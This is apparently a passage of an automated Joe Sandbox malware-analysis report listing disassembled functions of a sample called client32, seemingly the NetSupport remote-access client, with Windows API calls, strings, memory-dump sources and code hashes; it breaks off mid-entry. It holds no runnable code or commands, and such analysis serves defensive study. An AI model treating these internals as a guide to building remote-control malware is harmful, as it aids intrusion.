                                                                                                                                    • InitializeCriticalSection.KERNEL32(111EE708,20F29797,1110FB6D,00000000,00000000,00000000,E8111B71,111834F3,000000FF,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000), ref: 110762FE
                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000000C,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,20F29797,00000000,00000001,00000000,00000000,1118B138,000000FF), ref: 11076367
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000024,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,20F29797,00000000,00000001,00000000,00000000,1118B138,000000FF), ref: 1107636D
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,20F29797,00000000,00000001,00000000,00000000), ref: 11076377
                                                                                                                                    • InitializeCriticalSection.KERNEL32(000004D0,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,20F29797,00000000,00000001,00000000,00000000), ref: 110763CC
                                                                                                                                    • InitializeCriticalSection.KERNEL32(000004F8,?,1110F22D,0003738B,30680D75,E8111B71,00000001,00000000,20F29797,00000000,00000001,00000000,00000000), ref: 110763D5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalInitializeSection$CreateEvent
                                                                                                                                    • String ID: *MaxRxPending$*TraceRecv$*TraceSend$General$_debug
                                                                                                                                    • API String ID: 57637462-2298398812
                                                                                                                                    • Opcode ID: 7586db3259a53728d63f6be2d691ccf3707823cbd97b0c78885cc56e26012659
                                                                                                                                    • Instruction ID: 06ccc5540fe39e817025fd6f1a9fd6d6e0fa44080d25a9a2500616ed5f0e287a
                                                                                                                                    • Opcode Fuzzy Hash: 7586db3259a53728d63f6be2d691ccf3707823cbd97b0c78885cc56e26012659
                                                                                                                                    • Instruction Fuzzy Hash: F651DF75A002859FDB11CF65CC84B9ABBE8FF84304F0485BAED599F245DB71A904CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1105E670 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 130windowregistryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegisterClassA.USER32 ref: 1105E6D2
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    • CreateWindowExA.USER32 ref: 1105E713
                                                                                                                                    • SetPropA.USER32 ref: 1105E79D
                                                                                                                                    • GetMessageA.USER32 ref: 1105E7C0
                                                                                                                                    • TranslateMessage.USER32(?), ref: 1105E7D6
                                                                                                                                    • DispatchMessageA.USER32 ref: 1105E7DC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
                                                                                                                                    • String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
                                                                                                                                    • API String ID: 13347155-1383313024
                                                                                                                                    • Opcode ID: c4ce10a125823395d7123ded6db8be442ac09d05e1da8a705fb572cdfc68ef74
                                                                                                                                    • Instruction ID: 935ceeef8014da56787e0eecf891f9bbedf7255f62cfcfd3cf10a2167a67f8da
                                                                                                                                    • Opcode Fuzzy Hash: c4ce10a125823395d7123ded6db8be442ac09d05e1da8a705fb572cdfc68ef74
                                                                                                                                    • Instruction Fuzzy Hash: DD410BB9E41766ABD750CFA5DD80F9BFBA4EB48708F008529F55697280F730A800CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111242E0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetVersionExA.KERNEL32(?,View,*NoHideFEP,00000000,00000000,00000001), ref: 1112433F
                                                                                                                                    • InterlockedExchange.KERNEL32(111F19B4,00000001), ref: 11124365
                                                                                                                                    • CreateWindowExA.USER32 ref: 111243AB
                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,11124260), ref: 111243CB
                                                                                                                                    • SetFocus.USER32(00000000), ref: 111243E2
                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 111243FC
                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 11124412
                                                                                                                                    • InterlockedExchange.KERNEL32(111F19B4,00000000), ref: 11124429
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ExchangeInterlockedLong$CreateDestroyFocusVersion
                                                                                                                                    • String ID: *NoHideFEP$View$button
                                                                                                                                    • API String ID: 1938198541-1502386645
                                                                                                                                    • Opcode ID: 3df1cd25a3e99283e66dc0eb30b6fc3792aa7aceeb4f9b7b3075ab98f919e26e
                                                                                                                                    • Instruction ID: e7f43078c421523e46d189802bbe7ea8140fa8570dcc46dc3c934ff96bec0ddb
                                                                                                                                    • Opcode Fuzzy Hash: 3df1cd25a3e99283e66dc0eb30b6fc3792aa7aceeb4f9b7b3075ab98f919e26e
                                                                                                                                    • Instruction Fuzzy Hash: 4831C134686266EFE724CF61DEC4B66FBB8BB0530DF940228F92593984EB70A504CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111729A7 Relevance: 18.5, APIs: 12, Instructions: 494COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4f2fbb7b2ec4f33fb024b5ca522fc3e6b56c9530bcb1e0a014f32eb048fae49d
                                                                                                                                    • Instruction ID: 6d8d6b77eeda029eef02af865f68eac74058afcd07d9a582dec04d6d47d7d352
                                                                                                                                    • Opcode Fuzzy Hash: 4f2fbb7b2ec4f33fb024b5ca522fc3e6b56c9530bcb1e0a014f32eb048fae49d
                                                                                                                                    • Instruction Fuzzy Hash: 46126B35A152699FDB22CF64CD84AD9FBB4FF0A314F0401D9E41AE7A84D7709A81CF92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 1100306D
                                                                                                                                    • GetStockObject.GDI32(00000007), ref: 11003089
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 1100309A
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110030A7
                                                                                                                                    • InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                                                                                    • GetSysColor.USER32(00000004), ref: 110030EB
                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                                                                                    • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1100311E
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 11003128
                                                                                                                                    • DeleteObject.GDI32(?), ref: 1100312E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4121194973-0
                                                                                                                                    • Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                                                                    • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                                                                                    • Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                                                                    • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11008270 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 264windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ReleaseDC.USER32 ref: 110082C5
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 11008415
                                                                                                                                    • DeleteDC.GDI32(?), ref: 11008422
                                                                                                                                    • DeleteObject.GDI32(?), ref: 1100842F
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    • GetDC.USER32(00000000), ref: 1100845D
                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 1100846A
                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,00000004,00000010), ref: 11008481
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11008495
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CompatibleCreateDeleteSelect$BitmapErrorExitLastMessageProcessReleasewsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 3309341160-2830328467
                                                                                                                                    • Opcode ID: f4d3b2537b23c5089b1a1b820e1898e5486d0111c290d1d317d9c227039c5d65
                                                                                                                                    • Instruction ID: 3850b8ccd8beb0e98ab4cbe1f7b01c035796fd6338f527faacd148ed971815aa
                                                                                                                                    • Opcode Fuzzy Hash: f4d3b2537b23c5089b1a1b820e1898e5486d0111c290d1d317d9c227039c5d65
                                                                                                                                    • Instruction Fuzzy Hash: D0B1F7B5A00B019FD364CF29C984AD7B7E5FB88359F10892EE5AE97351DB30B941CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11153730 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 11153763
                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 11153779
                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
                                                                                                                                    • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1115389B
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 111538C1
                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 111538D8
                                                                                                                                    • ReleaseDC.USER32 ref: 111538E7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                                                                    • String ID: (
                                                                                                                                    • API String ID: 602542589-3887548279
                                                                                                                                    • Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                                                                                    • Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
                                                                                                                                    • Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                                                                                    • Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110654E0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 80COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,770E9EB0,00000000), ref: 11065525
                                                                                                                                    • GetDC.USER32(00000000), ref: 11065558
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
                                                                                                                                    • ReleaseDC.USER32 ref: 110655B9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                    • String ID: 932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
                                                                                                                                    • API String ID: 1035833867-2526036698
                                                                                                                                    • Opcode ID: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                                                                                    • Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
                                                                                                                                    • Opcode Fuzzy Hash: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                                                                                    • Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1115E8B0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 77threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindWindowA.USER32 ref: 1115E8FA
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 1115E919
                                                                                                                                    • OpenProcess.KERNEL32(00000440,00000000,?,?), ref: 1115E92F
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,0002000B,?), ref: 1115E95C
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1115E97E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
